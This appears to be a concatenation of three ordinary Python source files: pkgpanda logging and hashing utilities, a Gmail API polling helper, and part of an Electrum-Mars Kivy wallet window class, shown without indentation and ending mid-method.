such that TeamCity can provide improved status reporting, log line highlighting, and failure
reporting. When pkgpanda is run in an environment other than TeamCity all meta-messages will
silently be omitted.
TeamCity docs: https://confluence.jetbrains.com/display/TCD10/Build+Script+Interaction+with+TeamCity
"""
def __init__(self):
self.loggers = []
if teamcity.is_running_under_teamcity():
self.loggers.append(TeamcityServiceMessages())
else:
self.loggers.append(PrintLogger())
def _custom_message(self, text, status, error_details='', flow_id=None):
for log in self.loggers:
log.customMessage(text, status, errorDetails=error_details, flowId=flow_id)
@contextmanager
def _block(self, log, name, flow_id):
log.blockOpened(name, flowId=flow_id)
log.progressMessage(name)
yield
log.blockClosed(name, flowId=flow_id)
@contextmanager
def scope(self, name, flow_id=None):
"""
Creates a new scope for TeamCity messages. This method is intended to be called in a ``with`` statement
:param name: The name of the scope
:param flow_id: Optional flow id that can be used if ``name`` can be non-unique
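Example (the scope name is illustrative)::
    messages = MessageLogger()
    with messages.scope('build package'):
        messages.normal('building...')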
"""
with ExitStack() as stack:
for log in self.loggers:
stack.enter_context(self._block(log, name, flow_id))
yield
def normal(self, text, flow_id=None):
self._custom_message(text=text, status='NORMAL', flow_id=flow_id)
def warning(self, text, flow_id=None):
self._custom_message(text=text, status='WARNING', flow_id=flow_id)
def error(self, text, flow_id=None, error_details=''):
self._custom_message(text=text, status='ERROR', flow_id=flow_id, error_details=error_details)
def failure(self, text, flow_id=None):
self._custom_message(text=text, status='FAILURE', flow_id=flow_id)
class PrintLogger:
def customMessage(self, text, status, errorDetails='', flowId=None): # noqa: N802, N803
print("{}: {} {}".format(status, text, errorDetails))
def progressMessage(self, message): # noqa: N802, N803
pass
def blockOpened(self, name, flowId=None): # noqa: N802, N803
print("starting: {}".format(name))
def blockClosed(self, name, flowId=None): # noqa: N802, N803
print("completed: {}".format(name))
logger = MessageLogger()
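# Illustrative usage sketch (not part of the original module): scope() opens a
# TeamCity block (or prints "starting:"/"completed:" markers outside TeamCity),
# and normal()/warning()/error() emit custom messages inside it. The scope name
# and messages below are hypothetical.
def _example_logger_usage():  # hypothetical helper, for illustration only
    with logger.scope("build package"):
        logger.normal("fetching sources")
        logger.warning("cache miss; rebuilding from scratch")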
def hash_str(s: str):
hasher = hashlib.sha1()
hasher.update(s.encode('utf-8'))
return hasher.hexdigest()
def hash_int(i: int):
return hash_str(str(i))
def hash_dict(d: dict):
item_hashes = []
for k in sorted(d.keys()):
assert isinstance(k, str)
item_hashes.append("{0}={1}".format(k, hash_checkout(d[k])))
return hash_str(",".join(item_hashes))
def hash_list(l: List[str]):
item_hashes = []
for item in sorted(l):
item_hashes.append(hash_checkout(item))
return hash_str(",".join(item_hashes))
def hash_checkout(item):
if isinstance(item, str) or isinstance(item, bytes):
return hash_str(item)
elif isinstance(item, dict):
return hash_dict(item)
elif isinstance(item, list):
return hash_list(item)
elif isinstance(item, int):
return hash_int(item)
elif isinstance(item, set):
return hash_list(list(item))
else:
raise NotImplementedError("{} of type {}".format(item, type(item)))
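# Illustrative sketch (not part of the original module): hash_checkout() gives a
# stable digest for nested, config-like values because dict keys and list items
# are sorted before hashing, so logically equal structures hash identically
# regardless of ordering. The sample values below are hypothetical.
def _example_hash_checkout():  # hypothetical helper, for illustration only
    first = {"b": [2, 1], "a": "x"}
    second = {"a": "x", "b": [1, 2]}
    assert hash_checkout(first) == hash_checkout(second)
    return hash_checkout(first)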
def split_by_token(token_prefix, token_suffix, string_, strip_token_decoration=False):
"""Yield a sequence of (substring, is_token) pairs comprising the string.
The string is split by token boundary, where a token is a substring that
begins with the token prefix and ends with the token suffix. is_token is
True if the substring is a token. If strip_token_decoration is True, tokens
are yielded without their prefix and suffix. Each token prefix must have a
matching suffix, and vice versa. Tokens may not be nested.
>>> list(split_by_token('{', '}', 'some text {token} some more text'))
[('some text ', False), ('{token}', True), (' some more text', False)]
>>> list(split_by_token('{', '}', 'some text {token} some more text', strip_token_decoration=True))
[('some text ', False), ('token', True), (' some more text', False)]
"""
def _next_substring(superstring, substring, start):
idx = superstring.find(substring, start)
if idx < 0:
return None
return idx, idx + len(substring)
def _raise_exception_if_suffix_in(substring):
if token_suffix in substring:
logging.debug("Token suffix found without matching prefix in string: {}".format(repr(string_)))
raise Exception("Token suffix found without matching prefix")
if len(token_prefix) == 0:
raise ValueError('Token prefix must be a nonzero length string')
if len(token_suffix) == 0:
raise ValueError('Token suffix must be a nonzero length string')
if string_ == '':
yield string_, False
num_chars_consumed = 0
while num_chars_consumed < len(string_):
# Find the next token.
token_start = _next_substring(string_, token_prefix, num_chars_consumed)
if not token_start:
# No token found. Yield the rest of the string and return.
remainder = string_[num_chars_consumed:]
_raise_exception_if_suffix_in(remainder)
yield remainder, False
return
# Yield the string preceding the token, if any.
if token_start[0] > num_chars_consumed:
preceding_string = string_[num_chars_consumed:token_start[0]]
_raise_exception_if_suffix_in(preceding_string)
yield preceding_string, False
# Find the end of the token.
token_end = _next_substring(string_, token_suffix, token_start[1])
if not token_end or token_prefix in string_[token_start[1]:token_end[0]]:
# Can't find a closing suffix, or found two consecutive prefixes without a suffix between them.
logging.debug("Token prefix found without matching suffix in string: {}".format(repr(string_)))
raise Exception("Token prefix found without matching suffix")
# Yield the token.
if strip_token_decoration:
# Omit the token's prefix and suffix.
yield string_[token_start[1]:token_end[0]], True
else:
# Yield the entire token.
yield string_[token_start[0]:token_end[1]], True
# Update the chars consumed count for the next iteration.
num_chars_consumed = token_end[1]
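# Illustrative sketch (not part of the original module): split_by_token() can
# drive simple template substitution by replacing token substrings with values
# from a mapping. The template and mapping below are hypothetical.
def _example_render(template, values):  # hypothetical helper, for illustration only
    parts = []
    for substring, is_token in split_by_token('{', '}', template, strip_token_decoration=True):
        parts.append(values[substring] if is_token else substring)
    return ''.join(parts)
# _example_render('hello {name}', {'name': 'world'}) -> 'hello world'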
|
gmail_sub.py
|
import calendar
import os
import threading
import time
from datetime import datetime, timezone
import apiclient
import httplib2
import oauth2client.file
credential_path = os.path.join(os.path.abspath(os.path.dirname(__file__)), "../token.json")
def credentials():
store = oauth2client.file.Storage(credential_path)
return store.get()
def service():
http = credentials().authorize(httplib2.Http())
return apiclient.discovery.build("gmail", "v1", http=http, cache_discovery=False)
def get_messages_list(user_id, from_address, after):
if from_address is None:
query = f"after:{after}"
else:
query = f"from:{from_address} after:{after}"
return service().users().messages() \
.list(userId=user_id, q=query).execute()
def get_message_detail(id, user_id):
return service().users().messages().get(id=id, userId=user_id).execute()
class GmailSub():
interval = 1
is_running = True
last_time = None
from_address = None
message_handler = None
error_handler = None
def __init__(self, user_id):
self.user_id = user_id
self.thread = threading.Thread(target=self.__start)
self.thread.daemon = True
self.thread.start()
def set_interval(self, interval):
self.interval = interval
def set_from_address(self, address):
self.from_address = address
def on_message(self, callback):
self.message_handler = callback
def on_error(self, callback):
self.error_handler = callback
def stop(self):
self.is_running = False
def __start(self):
while self.is_running:
try:
ms = self.__get_messages()
if self.message_handler is not None:
self.message_handler(ms)
except Exception as ex:
if self.error_handler is not None:
self.error_handler(ex)
time.sleep(self.interval)
def __get_messages(self):
if self.last_time is None:
after = calendar.timegm(datetime.now(timezone.utc).timetuple())
else:
after = self.last_time + 1
now = calendar.timegm(datetime.now(timezone.utc).timetuple())
resp = get_messages_list(self.user_id,
from_address=self.from_address,
after=after)
messages = []
self.last_time = now
if 'messages' not in resp:
return messages
for m in resp['messages']:
detail = get_message_detail(m['id'], self.user_id)
messages.append(detail)
return messages
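# Illustrative usage sketch (not part of the original module). GmailSub polls the
# Gmail API on a daemon thread and hands each batch of new message details to the
# registered callback; stop() ends the polling loop. The user id 'me', the sender
# address and the 60 second interval below are hypothetical choices.
def _example_gmail_sub():  # hypothetical helper, for illustration only
    sub = GmailSub('me')
    sub.set_interval(60)  # poll once a minute instead of the 1-second default
    sub.set_from_address('alerts@example.com')
    sub.on_message(lambda messages: print(len(messages), 'new message(s)'))
    sub.on_error(lambda exc: print('poll failed:', exc))
    return sub  # the caller is expected to call sub.stop() when done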
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum_mars.storage import WalletStorage, StorageReadWriteError
from electrum_mars.wallet_db import WalletDB
from electrum_mars.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum_mars.wallet import update_password_for_directory
from electrum_mars.plugin import run_hook
from electrum_mars import util
from electrum_mars.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
maybe_extract_bolt11_invoice)
from electrum_mars.invoices import PR_PAID, PR_FAILED
from electrum_mars import blockchain
from electrum_mars.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum_mars.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr
from electrum_mars.logging import Logger
from electrum_mars.bitcoin import COIN
from electrum_mars.gui import messages
from .i18n import _
from . import KIVY_GUI_PATH
from kivy.app import App
from kivy.core.window import Window
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import OpenWalletDialog, ChangePasswordDialog, PincodeDialog, PasswordDialog
from .uix.dialogs.choice_dialog import ChoiceDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_mars.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_mars.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_mars.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_mars.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
# register the widget cache used to keep memory usage down; the timeout is set
# to forever so the data stays cached
Cache.register('electrum_mars_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_mars.gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register(
'Roboto',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
)
from electrum_mars.util import (NoDynamicFeeEstimates, NotEnoughFunds,
BITCOIN_BIP21_URI_SCHEME, LIGHTNING_URI_SCHEME,
UserFacingException)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog, SwapDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum_mars.simple_config import SimpleConfig
from electrum_mars.plugin import Plugins
from electrum_mars.paymentrequest import PaymentRequest
class ElectrumWindow(App, Logger):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
lightning_gossip_num_peers = NumericProperty(0)
lightning_gossip_num_nodes = NumericProperty(0)
lightning_gossip_num_channels = NumericProperty(0)
lightning_gossip_num_queries = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
protocol = PREFERRED_NETWORK_PROTOCOL
def cb2(server_str):
popup.ids.server_str.text = server_str
servers = self.network.get_servers()
server_choices = {}
for _host, d in sorted(servers.items()):
port = d.get(protocol)
if port:
server = ServerAddr(_host, port, protocol=protocol)
server_choices[server.net_addr_str()] = _host
ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
net_params = self.network.get_parameters()
try:
server = ServerAddr.from_str_with_inference(server_str)
if not server: raise Exception("failed to parse")
except Exception as e:
self.show_error(_("Invalid server details: {}").format(repr(e)))
return
net_params = net_params._replace(server=server)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def choose_blockchain_dialog(self, dt):
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_gossip = BooleanProperty(False)
def on_use_gossip(self, instance, x):
self.electrum_config.set_key('use_gossip', self.use_gossip, True)
if self.network:
if self.use_gossip:
self.network.start_gossip()
else:
self.network.run_from_another_thread(
self.network.stop_gossip())
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
use_recoverable_channels = BooleanProperty(True)
def on_use_recoverable_channels(self, instance, x):
self.electrum_config.set_key('use_recoverable_channels', self.use_recoverable_channels, True)
def switch_to_send_screen(func):
# try until send_screen is available
def wrapper(self, *args):
f = lambda dt: (bool(func(self, *args) and False) if self.send_screen else bool(self.switch_to('send') or True)) if self.wallet else True
Clock.schedule_interval(f, 0.1)
return wrapper
@switch_to_send_screen
def set_URI(self, uri):
self.send_screen.set_URI(uri)
@switch_to_send_screen
def set_ln_invoice(self, invoice):
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = str(intent.getDataString())
scheme = str(intent.getScheme()).lower()
if scheme == BITCOIN_BIP21_URI_SCHEME or scheme == LIGHTNING_URI_SCHEME:
self.set_URI(data)
def on_language(self, instance, language):
self.logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
self.logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
self.logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, wallet, key, status):
req = self.wallet.receive_requests.get(key)
if req is None:
return
if self.receive_screen:
if status == PR_PAID:
self.receive_screen.update()
else:
self.receive_screen.update_item(key, req)
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, wallet, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = self.wallet.get_invoice_status(req)
if self.send_screen:
if status == PR_PAID:
self.send_screen.update()
else:
self.send_screen.update_item(key, req)
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
def on_payment_succeeded(self, event, wallet, key):
description = self.wallet.get_label(key)
self.show_info(_('Payment succeeded') + '\n\n' + description)
self._trigger_update_history()
def on_payment_failed(self, event, wallet, key, reason):
self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
return self.electrum_config.get_base_unit()
def _set_bu(self, value):
self.electrum_config.set_base_unit(value)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return self.electrum_config.get_decimal_point()
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / COIN
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = COIN * Decimal(fiat_amount) / Decimal(rate)
return format_satoshis_plain(satoshis, decimal_point=self.decimal_point())
def get_amount(self, amount_str: str) -> Optional[int]:
if not amount_str:
return None
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
    '''Current screen orientation of the device the app is running on.
    Can be one of `landscape` or `portrait`.
    :data:`orientation` is a read only `AliasProperty`. Defaults to 'landscape'.
    '''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
    '''Tries to ascertain the kind of device the app is running on.
    Can be one of `tablet` or `phone`.
    :data:`ui_mode` is a read only `AliasProperty`. Defaults to 'phone'.
    '''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
self._use_single_password = False
self.resume_dialog = None
App.__init__(self)#, **kwargs)
Logger.__init__(self)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.server.host
self.server_port = str(net_params.server.port)
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_gossip = config.get('use_gossip', False)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.set_fee_status()
self.invoice_popup = None
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data: str):
from electrum_mars.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.set_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum_mars.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for name in ['send', 'history', 'receive']:
self.update_tab(name)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
self.request_popup = RequestDialog('Request', key)
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = invoice.invoice if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None, help_text=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(
title, data, show_text,
failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard,
help_text=help_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return self.scan_qr_non_android(on_complete)
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def scan_qr_non_android(self, on_complete):
from electrum_mars import qrscanner
try:
video_dev = self.electrum_config.get_video_device()
data = qrscanner.scan_barcode(video_dev)
if data is not None:
on_complete(data)
except UserFacingException as e:
self.show_error(e)
except BaseException as e:
self.logger.exception('camera error')
self.show_error(repr(e))
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file(KIVY_GUI_PATH + '/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
self.logger.exception('crash on startup')
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
self.logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
util.register_callback(self.on_network_event, interests)
util.register_callback(self.on_fee, ['fee'])
util.register_callback(self.on_fee_histogram, ['fee_histogram'])
util.register_callback(self.on_quotes, ['on_quotes'])
util.register_callback(self.on_history, ['on_history'])
util.register_callback(self.on_channels, ['channels_updated'])
util.register_callback(self.on_channel, ['channel'])
util.register_callback(self.on_invoice_status, ['invoice_status'])
util.register_callback(self.on_request_status, ['request_status'])
util.register_callback(self.on_payment_failed, ['payment_failed'])
util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
util.register_callback(self.on_channel_db, ['channel_db'])
util.register_callback(self.set_num_peers, ['gossip_peers'])
util.register_callback(self.set_unknown_channels, ['unknown_channels'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def on_channel_db(self, event, num_nodes, num_channels, num_policies):
self.lightning_gossip_num_nodes = num_nodes
self.lightning_gossip_num_channels = num_channels
def set_num_peers(self, event, num_peers):
self.lightning_gossip_num_peers = num_peers
def set_unknown_channels(self, event, unknown):
self.lightning_gossip_num_queries = unknown
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_success(self, storage, db, password):
self.password = password
if self.electrum_config.get('single_password'):
self._use_single_password = update_password_for_directory(self.electrum_config, password, password)
self.logger.info(f'use single password: {self._use_single_password}')
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
def on_wizard_aborted(self):
# wizard did not return a wallet; and there is no wallet open atm
if not self.wallet:
self.stop()
def load_wallet_by_name(self, path):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
if self.password and self._use_single_password:
storage = WalletStorage(path)
# call check_password to decrypt
storage.check_password(self.password)
self.on_open_wallet(self.password, storage)
return
d = OpenWalletDialog(self, path, self.on_open_wallet)
d.open()
def on_open_wallet(self, password, storage):
if not storage.file_exists():
wizard = InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.run('new')
else:
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
assert not db.requires_upgrade()
self.on_wizard_success(storage, db, password)
def on_stop(self):
self.logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
else:
self._settings_dialog.update()
self._settings_dialog.open()
def lightning_open_channel_dialog(self):
if not self.wallet.has_lightning():
self.show_error(_('Lightning is not enabled for this wallet'))
return
if not self.wallet.lnworker.channels and not self.wallet.lnworker.channel_backups:
warning = _(messages.MSG_LIGHTNING_WARNING)
d = Question(_('Do you want to create your first channel?') +
'\n\n' + warning, self.open_channel_dialog_with_warning)
d.open()
else:
d = LightningOpenChannelDialog(self)
d.open()
def swap_dialog(self):
d = SwapDialog(self, self.electrum_config)
d.open()
def open_channel_dialog_with_warning(self, b):
if b:
d = LightningOpenChannelDialog(self)
d.open()
def lightning_channels_dialog(self):
if self._channels_dialog is None:
self._channels_dialog = LightningChannelsDialog(self)
self._channels_dialog.open()
def on_channel(self, evt, wallet, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def is_wallet_creation_disabled(self):
return bool(self.electrum_config.get('single_password')) and self.password is None
def wallets_dialog(self):
from .uix.dialogs.wallets import WalletDialog
dirname = os.path.dirname(self.electrum_config.get_wallet_path())
d = WalletDialog(dirname, self.load_wallet_by_name, self.is_wallet_creation_disabled())
d.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
self.wallets_dialog()
elif name == 'status':
